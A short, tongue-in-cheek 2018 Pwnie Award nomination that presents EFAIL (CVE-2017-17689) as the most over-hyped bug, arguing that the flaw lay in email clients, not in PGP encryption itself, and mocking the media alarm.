The 2018 Pwnie Nominee For Most Over-Hyped Bug

EFAIL

Credit: Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk

EFAIL indicates it was a vulnerability in end-to-end encryption technology OpenPGP that leaked plaintext of encrypted emails. The EFF came out and said to disable or uninstall tools that do PGP encrypted email. Encryption was a luxury of the past, call you lawyer – your spouse is reading your email. This was presented at USENIX, had a website, logo, name, etc. Wired called is a Major, Divisive flaw. Wired UK said PGP was dead. The Washington Post and USA Today joined in.

However, it turns out it wasn’t a crypto vulnerability or even an GPG vulnerability, but rather problems with email clients. GnuPG maintainters said it was overhyped. So in the end, it didn’t affect too many people, and after all the app is called “Pretty Good Privacy”. Is that like hacking a web application with a pretty good security assesment? Plus, Mutt wasn’t even vulnerable.

EFAIL(CVE-2017-17689)